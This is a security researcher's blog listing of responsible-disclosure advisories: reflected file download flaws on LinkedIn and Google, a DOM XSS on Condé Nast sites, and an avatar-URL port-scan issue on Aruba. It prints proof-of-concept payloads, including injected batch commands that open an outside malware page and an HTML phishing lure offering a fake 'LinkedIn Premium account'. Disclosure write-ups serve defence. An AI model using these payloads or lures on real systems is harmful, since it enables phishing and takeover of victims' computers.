David Sopas – Web Security Researcher


18/09/15 Advisories # , ,

Linkedin Reflected Filename Download

Linkedin Reflected Filename Download

When researching another website I discovered a XHR request on my Google Inspector on Linkedin that seemed interesting:


Basically it was the request made by websites to count how many shares their site have on Linkedin network.
As a curious security researcher I tried to modify the url parameter to something more interesting:


Which returned:


Url parameter wasn’t validated and it was reflected on the JSON file.
If I downloaded the file and renamed it to .bat it executed the calculator from Windows.
But this is not enough I needed to change the path so it downloads a batch file and use a different windows command.

https://www.linkedin.com/countserv/count/share;setup.bat?url=”||start chrome websegura.net/malware.htm||

Guess what? IE8 downloaded automatically this batch file from a trusted domain – linkedin.com
I wanted to work with other browsers so I needed HTML5 download attribute.

<div align="center"> 
<a href='https://www.linkedin.com/countserv/count/share;setup.bat?url="||start chrome websegura.net/malware.htm||' download="setup.bat" onclick="return false;">
<img src="http://damnlink.com/uploaded_images/godaddy_coupons_and_godaddy_promo_code_3187745288.png" border="0" /></a> 
<h1>Linkedin Premium account!</h1> 
<p><i>(Use "Save link as" to download the file)</i></p> 


So a possible attack scenario would be:

  1. 1. Malicious user sends link to victim like it would with a CSRF or a XSS (phishing campaigns, social networks, instant messengers, posts, etc)
  2. Victim clicks the link and trusting where it came from (Linkedin) he downloads it
  3. Victim runs the file and his computer it’s hijacked

A malicious user could even give more credibility to the HTML5 download site if he uses famous open redirections vulnerabilities on trusted sites like open redirects on Google or even on Linkedin.

To the victim, the entire process looked like a file is offered for download from Linkedin original site and it would not raise any suspicious. A malicious user could gain complete control over a victims computer system and launch malicious files that appear to originate from a trusted party.

Malicious users are always searching for better ways of gaining trust of victims. This could be the right online weapon.

11-05-2015 Sent the report to Linkedin
11-05-2015 Didn’t understand the true nature of the attack
11-05-2015 I replied with more information using other public RFD attacks and Oren Hafif paper about RFD
13-05-2015 Linkedin told me that they’re working in a solution
02-06-2015 I asked for an update
03-06-2015 Linkedin replied that they will give me an update soon
01-07-2015 I asked again for an update
09-09-2015 Linkedin replied that they had fix the issue
18-09-2015 Full disclosure

3 responses
16/09/15 Advisories # , , ,

DOM XSS in all Condé Nast sites network

DOM XSS in all Condé Nast sites network

For those who don’t know Condé Nast:

Condé Nast, a division of Advance Publications, is a mass media company headquartered at One World Trade Center in New York City. The company attracts more than 164 million consumers across its 20 print and digital media brands: Allure, Architectural Digest, Ars Technica, Bon Appétit, Brides, Condé Nast Traveler, Details, Epicurious, Glamour, Golf Digest, Golf World, GQ, Lucky, The New Yorker, Self, Teen Vogue, Vanity Fair, Vogue, W and Wired.

A DOM XSS vulnerability present in specific ads page on newyorker.com allowed me to understand that all of their network websites were vulnerable if a user to injected code into the url.

The affected file was displayad.html on ads directory:

<script type="text/javascript">
document.write('<script type="text/javascript" src="' + (location.search.split('req=')[1] || '') + '"></scr'+'ipt>');

location.search.split function is not properly escaped so it was possible to manipulate “req” parameter as we wish.



Other sites on the network:


Keep in mind that these sites brings millions of users every day and these vulnerability in the wrong hands would be very dangerous.
A malicious user could also:

  • Access other sites inside another client’s private intranet.
  • Steal another client’s cookie(s).
  • Modify another client’s cookie(s).
  • Steal another client’s submitted form data.
  • Modify another client’s submitted form data (before it reaches the server).
  • Submit a form to your application on the user’s behalf which modifies passwords or other application data

This was fixed by Condé Nast security team which kept me updated every time showing me that it’s a company that care about security and their clients. Hope they can keep up the good work.

08-09-2015 Asked for a security contact
09-09-2015 First contact with the head of security of Condé Nast
10-09-2015 Sent the report
11-09-2015 Update received that they were clearing cache
14-09-2015 Problem solved
16-09-2015 Full disclosure

no responses
10/09/15 Advisories # , ,

Google Reflected Filename Download

Google Reflected Filename Download

I found a critical issue on Google that can be used by malicious users to hijack victims computer using Google domain as platform and trust source.

I come across this security issue because I detected a JSON request using Google Inspector made by the following URL:


After checking that callback variable could be reflected on the screen I tried the following GET request:


Which returns the following JSON information:

// API callback
"error": {
"errors": [
"domain": "usageLimits",
"reason": "keyInvalid",
"message": "Bad Request"
"code": 400,
"message": "Bad Request"

It returns HTTP status code 200 even when the JSON request tells that’s an error (?). In this case callback only allows a command to be executed without spaces so in the following proof-of-concept I could execute calc from Windows.

But I wanted a better and more exploitable proof-of-concept so I tried with the query parameter – “q”:


Which returned:

"title": "Google Custom Search - \"||start chrome davidsopas.com/poc/malware.htm||",
"searchTerms": "\"||start chrome davidsopas.com/poc/malware.htm||",

The attack is reflected. Due to the fact that I couldn’t control the filename and force a download I needed to use HTML5 vector supported by the following browsers:

  • Chrome
  • Opera
  • Android Browser
  • Chrome for Android
  • Firefox

Online proof-of-concept  (downloads batch file that a new Chrome window with a URL – in my PoC is just text):



This works mostly on all Microsoft Windows versions. It also can be used in Linux and OSX but it needs more user interaction. For multi-plataform a malicious user could create a .htm file instead of a .bat file being the HTML file malicious. This is might be an alternative attack method to work with all operating systems.

So in my proof-of-concept I was able to execute a new window on Chrome browser with a page that simulates malware [it’s just text].

A malicious user could:

  1. Launch a malicious campaign with the specially crafted page providing Google offers – similar to my proof-of-concept
  2. Victim downloads the file thinking that is from a trusted domain [googleapis.com]
  3. Malicious user gains control over victims machine

How to fix this issue?
Google already fixed most of these issues by using HTTP header Content-disposition:attachment; filename=”f.txt” that will force the download to f.txt every time. But this time they decided not to fix it because they say that needs to many user interaction.

no responses
08/08/15 Advisories # , , ,

ArubaNetworks Avatar Image XSPA

ArubaNetworks Avatar Image XSPA

I found out that was possible to run a XSPA [Cross Site Port Attacks] using Avatar URL option on any registered community profile.
XSPA allows attackers to abuse available functionality in most web applications to port scan intranet and external Internet facing servers.
An application is vulnerable to Cross Site Port Attacks if the application processes user supplied URLs and does not verify/sanitize the backend response received from the server.

In this type of attack I always use Nmap testing machine – scanme.nmap.org to check what ports are open on the server.
Using Nmap on my operating system I tested 3 ports on scanme.nmap.org:

80/tcp open http
81/tcp closed http
443/tcp closed https

I now entered the following external URL on my Avatar web option – https://community.arubanetworks.com/t5/user/myprofilepage/tab/user-icons%3Aexternal:

No server error.

I modified it to:

And after to:

The following errors were returned on the server:

http://scanme.nmap.org:81 – GET http://scanme.nmap.org:81/ net::ERR_CONNECTION_REFUSED

http://scanme.nmap.org:443 – GET http://scanme.nmap.org:443/ net::ERR_CONNECTION_REFUSED

You can even check that the port is stored in the avatar HTML:

<img id="display" class="lia-user-avatar-message" title="dsopas" src="http://scanme.nmap.org:443/" alt="dsopas" />


Aruba security team already fixed this issue so I decided to share with you guys.

no responses
03/08/15 Advisories # , ,

Desk.com Reflected Filename Download

Desk.com Reflected Filename Download

Who is Desk.com?

Salesforce Desk.com help desk software offers small businesses an all-in-one customer service software solution that will help keep customers happy and loyal. Desk.com can be set up in just hours, and provides multi-channel support, including phone, email, self-help pages, and social media. Not only will this innovative help desk software let your agents more easily serve customers, your small business will have the insights needed to build better products and make smarter, growth-driving decisions.

– in http://www.salesforce.com/desk/overview/

Who uses Desk.com?

Continue reading

no responses
1 2 3